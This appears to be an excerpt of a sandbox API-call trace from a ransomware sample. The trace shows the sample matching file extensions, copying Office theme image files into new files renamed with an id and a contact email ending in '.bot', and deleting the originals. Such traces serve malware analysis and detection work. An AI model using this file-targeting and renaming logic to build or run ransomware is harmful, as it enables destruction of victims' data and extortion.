	[0044.338] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0044.338] lstrlenW (lpString=".docx") returned 5
	[0044.339] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0044.339] lstrlenW (lpString=".pdf") returned 4
	[0044.339] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0044.339] lstrlenW (lpString=".xls") returned 4
	[0044.339] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0044.339] lstrlenW (lpString=".xlsx") returned 5
	[0044.339] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0044.339] lstrlenW (lpString=".ppt") returned 4
	[0044.339] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0044.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74
	[0044.339] lstrlenW (lpString=".zip") returned 4
	[0044.339] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0044.339] lstrlenW (lpString=".rar") returned 4
	[0044.339] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0044.339] lstrlenW (lpString=".bz2") returned 4
	[0044.339] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0044.339] lstrlenW (lpString=".7z") returned 3
	[0044.339] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0044.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74
	[0044.339] lstrlenW (lpString=".dbf") returned 4
	[0044.339] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0044.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74
	[0044.339] lstrlenW (lpString=".1cd") returned 4
	[0044.339] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0044.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74
	[0044.339] lstrlenW (lpString=".jpg") returned 4
	[0044.339] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0044.339] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0044.339] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0044.339] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0044.340] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=33559) returned 1
	[0044.340] CloseHandle (hObject=0x1cc) returned 1
	[0044.340] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png")) returned 0x20
	[0044.340] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.340] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0044.340] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.340] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.340] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0044.340] GetLastError () returned 0x0
	[0044.341] ReadFile (in: hFile=0x1cc, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x8317, lpOverlapped=0x0) returned 1
	[0044.343] WriteFile (in: hFile=0x194, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x8320, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x8320, lpOverlapped=0x0) returned 1
	[0044.344] ReadFile (in: hFile=0x1cc, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.344] WriteFile (in: hFile=0x194, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0044.344] SetEndOfFile (hFile=0x194) returned 1
	[0044.344] CloseHandle (hObject=0x194) returned 1
	[0044.344] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.344] SetEndOfFile (hFile=0x1cc) returned 1
	[0044.345] CloseHandle (hObject=0x1cc) returned 1
	[0044.345] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.346] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png")) returned 1
	[0044.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75
	[0044.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75
	[0044.346] lstrlenW (lpString=".doc") returned 4
	[0044.346] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.346] lstrlenW (lpString=".docx") returned 5
	[0044.346] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.346] lstrlenW (lpString=".pdf") returned 4
	[0044.346] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.346] lstrlenW (lpString=".xls") returned 4
	[0044.346] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.346] lstrlenW (lpString=".xlsx") returned 5
	[0044.346] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.346] lstrlenW (lpString=".ppt") returned 4
	[0044.346] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75
	[0044.346] lstrlenW (lpString=".zip") returned 4
	[0044.346] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.346] lstrlenW (lpString=".rar") returned 4
	[0044.346] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.346] lstrlenW (lpString=".bz2") returned 4
	[0044.346] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.346] lstrlenW (lpString=".7z") returned 3
	[0044.346] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75
	[0044.346] lstrlenW (lpString=".dbf") returned 4
	[0044.346] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75
	[0044.347] lstrlenW (lpString=".1cd") returned 4
	[0044.347] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75
	[0044.347] lstrlenW (lpString=".jpg") returned 4
	[0044.347] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75
	[0044.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75
	[0044.347] lstrlenW (lpString=".doc") returned 4
	[0044.347] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.347] lstrlenW (lpString=".docx") returned 5
	[0044.347] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.347] lstrlenW (lpString=".pdf") returned 4
	[0044.347] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.347] lstrlenW (lpString=".xls") returned 4
	[0044.347] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.347] lstrlenW (lpString=".xlsx") returned 5
	[0044.347] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.347] lstrlenW (lpString=".ppt") returned 4
	[0044.347] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75
	[0044.347] lstrlenW (lpString=".zip") returned 4
	[0044.347] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.347] lstrlenW (lpString=".rar") returned 4
	[0044.347] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.347] lstrlenW (lpString=".bz2") returned 4
	[0044.347] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.347] lstrlenW (lpString=".7z") returned 3
	[0044.347] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75
	[0044.347] lstrlenW (lpString=".dbf") returned 4
	[0044.347] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75
	[0044.347] lstrlenW (lpString=".1cd") returned 4
	[0044.347] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75
	[0044.348] lstrlenW (lpString=".jpg") returned 4
	[0044.348] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.348] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0044.348] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0044.348] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0044.348] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=2476) returned 1
	[0044.348] CloseHandle (hObject=0x1cc) returned 1
	[0044.348] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif")) returned 0x20
	[0044.348] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.348] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0044.348] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.349] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.349] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0044.707] GetLastError () returned 0x0
	[0044.707] ReadFile (in: hFile=0x1cc, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x9ac, lpOverlapped=0x0) returned 1
	[0044.910] WriteFile (in: hFile=0x194, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x9b0, lpOverlapped=0x0) returned 1
	[0044.911] ReadFile (in: hFile=0x1cc, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.911] WriteFile (in: hFile=0x194, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0044.911] SetEndOfFile (hFile=0x194) returned 1
	[0044.911] CloseHandle (hObject=0x194) returned 1
	[0044.912] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.912] SetEndOfFile (hFile=0x1cc) returned 1
	[0044.912] CloseHandle (hObject=0x1cc) returned 1
	[0044.912] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.913] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif")) returned 1
	[0044.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72
	[0044.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72
	[0044.913] lstrlenW (lpString=".doc") returned 4
	[0044.913] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0044.913] lstrlenW (lpString=".docx") returned 5
	[0044.913] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0044.913] lstrlenW (lpString=".pdf") returned 4
	[0044.913] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0044.913] lstrlenW (lpString=".xls") returned 4
	[0044.913] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0044.913] lstrlenW (lpString=".xlsx") returned 5
	[0044.913] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0044.913] lstrlenW (lpString=".ppt") returned 4
	[0044.913] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0044.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72
	[0044.913] lstrlenW (lpString=".zip") returned 4
	[0044.913] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0044.913] lstrlenW (lpString=".rar") returned 4
	[0044.913] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0044.913] lstrlenW (lpString=".bz2") returned 4
	[0044.913] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0044.914] lstrlenW (lpString=".7z") returned 3
	[0044.914] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0044.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72
	[0044.914] lstrlenW (lpString=".dbf") returned 4
	[0044.914] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0044.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72
	[0044.914] lstrlenW (lpString=".1cd") returned 4
	[0044.914] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0044.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72
	[0044.914] lstrlenW (lpString=".jpg") returned 4
	[0044.914] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0044.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72
	[0044.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72
	[0044.914] lstrlenW (lpString=".doc") returned 4
	[0044.914] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0044.914] lstrlenW (lpString=".docx") returned 5
	[0044.914] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0044.914] lstrlenW (lpString=".pdf") returned 4
	[0044.914] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0044.914] lstrlenW (lpString=".xls") returned 4
	[0044.914] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0044.914] lstrlenW (lpString=".xlsx") returned 5
	[0044.914] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0044.914] lstrlenW (lpString=".ppt") returned 4
	[0044.914] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0044.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72
	[0044.914] lstrlenW (lpString=".zip") returned 4
	[0044.914] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0044.914] lstrlenW (lpString=".rar") returned 4
	[0044.914] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0044.914] lstrlenW (lpString=".bz2") returned 4
	[0044.914] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0044.914] lstrlenW (lpString=".7z") returned 3
	[0044.914] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0044.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72
	[0044.915] lstrlenW (lpString=".dbf") returned 4
	[0044.915] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0044.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72
	[0044.915] lstrlenW (lpString=".1cd") returned 4
	[0044.915] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0044.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72
	[0044.915] lstrlenW (lpString=".jpg") returned 4
	[0044.915] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0044.915] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0044.915] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0044.915] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0044.915] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=1593) returned 1
	[0044.915] CloseHandle (hObject=0x1cc) returned 1
	[0044.916] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif")) returned 0x20
	[0044.916] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.916] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0044.916] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.916] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.916] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0045.219] GetLastError () returned 0x0
	[0045.219] ReadFile (in: hFile=0x1cc, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x639, lpOverlapped=0x0) returned 1
	[0045.589] WriteFile (in: hFile=0x228, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x640, lpOverlapped=0x0) returned 1
	[0045.590] ReadFile (in: hFile=0x1cc, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.590] WriteFile (in: hFile=0x228, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0045.590] SetEndOfFile (hFile=0x228) returned 1
	[0045.590] CloseHandle (hObject=0x228) returned 1
	[0045.590] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.590] SetEndOfFile (hFile=0x1cc) returned 1
	[0045.591] CloseHandle (hObject=0x1cc) returned 1
	[0045.591] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0045.591] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif")) returned 1
	[0045.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73
	[0045.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73
	[0045.592] lstrlenW (lpString=".doc") returned 4
	[0045.592] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0045.592] lstrlenW (lpString=".docx") returned 5
	[0045.592] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0045.592] lstrlenW (lpString=".pdf") returned 4
	[0045.592] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0045.592] lstrlenW (lpString=".xls") returned 4
	[0045.592] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0045.592] lstrlenW (lpString=".xlsx") returned 5
	[0045.592] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0045.592] lstrlenW (lpString=".ppt") returned 4
	[0045.592] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0045.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73
	[0045.592] lstrlenW (lpString=".zip") returned 4
	[0045.592] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0045.592] lstrlenW (lpString=".rar") returned 4
	[0045.592] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0045.592] lstrlenW (lpString=".bz2") returned 4
	[0045.592] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0045.592] lstrlenW (lpString=".7z") returned 3
	[0045.592] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0045.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73
	[0045.592] lstrlenW (lpString=".dbf") returned 4
	[0045.592] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0045.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73
	[0045.592] lstrlenW (lpString=".1cd") returned 4
	[0045.592] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0045.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73
	[0045.592] lstrlenW (lpString=".jpg") returned 4
